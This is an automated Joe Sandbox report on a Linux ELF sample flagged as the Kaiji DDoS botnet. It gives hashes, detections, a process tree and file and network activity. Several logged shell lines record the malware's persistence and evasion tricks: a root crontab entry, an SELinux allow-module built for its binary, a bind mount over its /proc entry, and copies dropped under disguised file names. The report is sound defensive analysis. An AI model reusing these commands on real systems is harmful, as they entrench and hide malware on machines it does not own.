Edit tour

Linux Analysis Report
Ww0lpzmYHO.elf

Overview

General Information

Sample name:	Ww0lpzmYHO.elf renamed because original name is a hash value
Original sample name:	3b0cc5dd65238abdc55e9c47d0d8660f.elf
Analysis ID:	1547220
MD5:	3b0cc5dd65238abdc55e9c47d0d8660f
SHA1:	81d42740e04d5378d96c1a8ebd7de21863225dc4
SHA256:	a65f1664ac6666e1e1b324464d5a3a125c89764940a022d056b9a2d65ad5ed0e
Tags:	32elfintel
Infos:

Detection

Kaiji

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Yara detected Kaiji

Drops files in suspicious directories

Machine Learning detection for sample

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using cron

Sample tries to set files in /etc globally writable

Creates hidden files and/or directories

Creates hidden files without content (potentially used as a mutex)

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "rm" command used to delete files or directories

Executes the "sleep" command used to delay execution and potentially evade sandboxes

Executes the "systemctl" command used for controlling the systemd system and service manager

Reads the 'hosts' file potentially containing internal network hosts

Sample has stripped symbol table

Sample tries to set the executable flag

Sleeps for long times indicative of sandbox evasion

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Writes shell script files to disk

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1547220
Start date and time:	2024-11-02 03:55:27 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	Ww0lpzmYHO.elf renamed because original name is a hash value
Original Sample Name:	3b0cc5dd65238abdc55e9c47d0d8660f.elf
Detection:	MAL
Classification:	mal76.spre.troj.evad.linELF@0/57@201/0

Warnings

VT rate limit hit for: www.google.com

Runtime Messages

Command:	/tmp/Ww0lpzmYHO.elf
PID:	6256
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

Ww0lpzmYHO.elf (PID: 6256, Parent: 6181, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /tmp/Ww0lpzmYHO.elf

Ww0lpzmYHO.elf New Fork (PID: 6261, Parent: 6256)

Ww0lpzmYHO.elf (PID: 6261, Parent: 6256, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /tmp/Ww0lpzmYHO.elf

Ww0lpzmYHO.elf New Fork (PID: 6266, Parent: 6261)

bash (PID: 6266, Parent: 6261, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c /etc/32676&

bash New Fork (PID: 6269, Parent: 6266)

32676 (PID: 6269, Parent: 1860, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /etc/32676

32676 New Fork (PID: 6272, Parent: 6269)

sleep (PID: 6272, Parent: 6269, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60

32676 New Fork (PID: 6450, Parent: 6269)

opt.services.cfg (PID: 6450, Parent: 6269, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /etc/opt.services.cfg

opt.services.cfg New Fork (PID: 6454, Parent: 6450)

opt.services.cfg (PID: 6454, Parent: 6450, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /etc/opt.services.cfg

32676 New Fork (PID: 6459, Parent: 6269)

sleep (PID: 6459, Parent: 6269, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60

32676 New Fork (PID: 6528, Parent: 6269)

opt.services.cfg (PID: 6528, Parent: 6269, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /etc/opt.services.cfg

opt.services.cfg New Fork (PID: 6532, Parent: 6528)

opt.services.cfg (PID: 6532, Parent: 6528, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /etc/opt.services.cfg

32676 New Fork (PID: 6540, Parent: 6269)

sleep (PID: 6540, Parent: 6269, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60

Ww0lpzmYHO.elf New Fork (PID: 6270, Parent: 6261)

service (PID: 6270, Parent: 6261, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start

service New Fork (PID: 6271, Parent: 6270)

basename (PID: 6271, Parent: 6270, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 6273, Parent: 6270)

basename (PID: 6273, Parent: 6270, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 6274, Parent: 6270)

systemctl (PID: 6274, Parent: 6270, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target

service New Fork (PID: 6277, Parent: 6270)

service New Fork (PID: 6278, Parent: 6277)

systemctl (PID: 6278, Parent: 6277, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket

service New Fork (PID: 6279, Parent: 6277)

sed (PID: 6279, Parent: 6277, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

systemctl (PID: 6270, Parent: 6261, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service

Ww0lpzmYHO.elf New Fork (PID: 6300, Parent: 6261)

bash (PID: 6300, Parent: 6261, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"

bash New Fork (PID: 6301, Parent: 6300)

systemctl (PID: 6301, Parent: 6300, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

bash New Fork (PID: 6306, Parent: 6300)

systemctl (PID: 6306, Parent: 6300, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable quotaoff.service

bash New Fork (PID: 6310, Parent: 6300)

systemctl (PID: 6310, Parent: 6300, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start quotaoff.service

bash New Fork (PID: 6320, Parent: 6300)

journalctl (PID: 6320, Parent: 6300, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager

Ww0lpzmYHO.elf New Fork (PID: 6333, Parent: 6261)

bash (PID: 6333, Parent: 6261, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"

bash New Fork (PID: 6334, Parent: 6333)

bash New Fork (PID: 6335, Parent: 6333)

bash New Fork (PID: 6336, Parent: 6333)

Ww0lpzmYHO.elf New Fork (PID: 6337, Parent: 6261)

bash (PID: 6337, Parent: 6261, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"

Ww0lpzmYHO.elf New Fork (PID: 6340, Parent: 6261)

renice (PID: 6340, Parent: 6261, MD5: 3686c936ed1df483498266a36871cb5b) Arguments: renice -20 6261

Ww0lpzmYHO.elf New Fork (PID: 6341, Parent: 6261)

mount (PID: 6341, Parent: 6261, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/6261

Ww0lpzmYHO.elf New Fork (PID: 6365, Parent: 6261)

service (PID: 6365, Parent: 6261, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start

service New Fork (PID: 6366, Parent: 6365)

basename (PID: 6366, Parent: 6365, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 6367, Parent: 6365)

basename (PID: 6367, Parent: 6365, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 6368, Parent: 6365)

systemctl (PID: 6368, Parent: 6365, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target

service New Fork (PID: 6380, Parent: 6365)

service New Fork (PID: 6381, Parent: 6380)

systemctl (PID: 6381, Parent: 6380, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket

service New Fork (PID: 6382, Parent: 6380)

sed (PID: 6382, Parent: 6380, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

systemctl (PID: 6365, Parent: 6261, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service

Ww0lpzmYHO.elf New Fork (PID: 6384, Parent: 6261)

systemctl (PID: 6384, Parent: 6261, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service

dash New Fork (PID: 6275, Parent: 4331)

rm (PID: 6275, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.9rMvpBJybs /tmp/tmp.uaBIl5G6jS /tmp/tmp.4dkKp3sm3s

dash New Fork (PID: 6276, Parent: 4331)

rm (PID: 6276, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.9rMvpBJybs /tmp/tmp.uaBIl5G6jS /tmp/tmp.4dkKp3sm3s

systemd New Fork (PID: 6303, Parent: 6302)

snapd-env-generator (PID: 6303, Parent: 6302, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6308, Parent: 6307)

snapd-env-generator (PID: 6308, Parent: 6307, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6311, Parent: 1)

System.mod (PID: 6311, Parent: 1, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /boot/System.mod

System.mod New Fork (PID: 6315, Parent: 6311)

System.mod (PID: 6315, Parent: 6311, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /boot/System.mod

systemd New Fork (PID: 6324, Parent: 1)

System.mod (PID: 6324, Parent: 1, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /boot/System.mod

System.mod New Fork (PID: 6329, Parent: 6324)

System.mod (PID: 6329, Parent: 6324, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /boot/System.mod

udisksd New Fork (PID: 6353, Parent: 799)

dumpe2fs (PID: 6353, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6383, Parent: 1)

cron (PID: 6383, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 6411, Parent: 6383)

cron New Fork (PID: 6412, Parent: 6411)

sh (PID: 6412, Parent: 6411, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 6413, Parent: 6412)

.mod (PID: 6413, Parent: 6412, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 6414, Parent: 6413)

libgdi.so.0.8.1 (PID: 6414, Parent: 6413, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /usr/lib/libgdi.so.0.8.1

libgdi.so.0.8.1 New Fork (PID: 6418, Parent: 6414)

libgdi.so.0.8.1 (PID: 6418, Parent: 6414, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /usr/lib/libgdi.so.0.8.1

systemd New Fork (PID: 6432, Parent: 1)

cron (PID: 6432, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 6472, Parent: 6432)

cron New Fork (PID: 6481, Parent: 6472)

sh (PID: 6481, Parent: 6472, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 6482, Parent: 6481)

.mod (PID: 6482, Parent: 6481, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 6483, Parent: 6482)

libgdi.so.0.8.1 (PID: 6483, Parent: 6482, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /usr/lib/libgdi.so.0.8.1

libgdi.so.0.8.1 New Fork (PID: 6487, Parent: 6483)

libgdi.so.0.8.1 (PID: 6487, Parent: 6483, MD5: 3b0cc5dd65238abdc55e9c47d0d8660f) Arguments: /usr/lib/libgdi.so.0.8.1

systemd New Fork (PID: 6510, Parent: 1)

cron (PID: 6510, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Kaiji	Surfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.	No Attribution	https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/ https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/ https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/ https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/ https://www.elastic.co/security-labs/betting-on-bots	https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Ww0lpzmYHO.elf	JoeSecurity_Kaiji_1	Yara detected Kaiji	Joe Security

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Ww0lpzmYHO.elf	Virustotal: Detection: 33%			Perma Link
Source: Ww0lpzmYHO.elf	ReversingLabs: Detection: 39%

Machine Learning detection for sample

Source: Ww0lpzmYHO.elf

Joe Sandbox ML: detected

Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)

Reads hosts file: /etc/hosts

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ss.us-tv.top

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39256
Source: unknown	Network traffic detected: HTTP traffic on port 39256 -> 443

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal76.spre.troj.evad.linELF@0/57@201/0

Source: ELF file section

Submission: Ww0lpzmYHO.elf

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/profile.d/bash_cfg.sh			Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/profile.d/gateway.sh			Jump to behavior

Sample tries to persist itself using cron

Source: /bin/bash (PID: 6337)

File: /etc/crontab

Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/opt.services.cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/32676 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/profile.d/bash_cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/.walk	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /dev/.walk.lod	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/.walk	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /dev/.old	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /dev/.img	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /.mod	Jump to behavior
Source: /etc/opt.services.cfg (PID: 6454)	File: /etc/.walk	Jump to behavior
Source: /etc/opt.services.cfg (PID: 6454)	File: /dev/.walk.lod	Jump to behavior
Source: /etc/opt.services.cfg (PID: 6532)	File: /etc/.walk	Jump to behavior
Source: /etc/opt.services.cfg (PID: 6532)	File: /dev/.walk.lod	Jump to behavior
Source: /boot/System.mod (PID: 6315)	File: /etc/.walk	Jump to behavior
Source: /boot/System.mod (PID: 6315)	File: /dev/.walk.lod	Jump to behavior
Source: /.mod (PID: 6413)	Directory: /.mod	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.1 (PID: 6418)	File: /etc/.walk	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.1 (PID: 6418)	File: /dev/.walk.lod	Jump to behavior
Source: /.mod (PID: 6482)	Directory: /.mod	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.1 (PID: 6487)	File: /etc/.walk	Jump to behavior

Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Empty hidden file: /dev/.old	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.1 (PID: 6418)	Empty hidden file: /dev/.walk.lod	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Empty hidden file: /dev/.img	Jump to behavior

Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1582/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/3088/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/230/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/110/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/231/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/111/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/232/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1579/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/112/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/233/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1699/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/113/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/234/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1335/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1698/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/114/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/235/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1334/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1576/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/2302/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/115/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/236/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/116/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/237/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/117/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/118/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/910/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/119/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/912/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/10/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/2307/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/4726/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/11/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/918/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/6241/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/12/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/6240/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/13/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/14/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/15/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/16/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/17/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/18/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1594/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/120/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/121/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1349/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/122/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/243/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/123/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/2/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/124/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/3/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/4/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/125/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/126/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1344/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1465/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1586/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/127/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/6/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/248/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/128/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/249/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1463/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/800/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/9/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/801/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/20/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/21/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1900/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/22/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/23/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/24/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/25/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/26/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/27/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/28/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/29/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/491/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/250/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/130/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/251/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/252/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/132/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/253/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/254/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/255/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/256/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1599/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/257/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1477/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/379/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/258/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1476/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/259/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1475/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/936/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/30/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/2208/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/35/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1809/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/1494/stat	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File opened: /proc/260/stat	Jump to behavior

Source: /tmp/Ww0lpzmYHO.elf (PID: 6266)	Shell command executed: /bin/bash -c /etc/32676&	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6300)	Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6333)	Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6337)	Shell command executed: /bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"	Jump to behavior
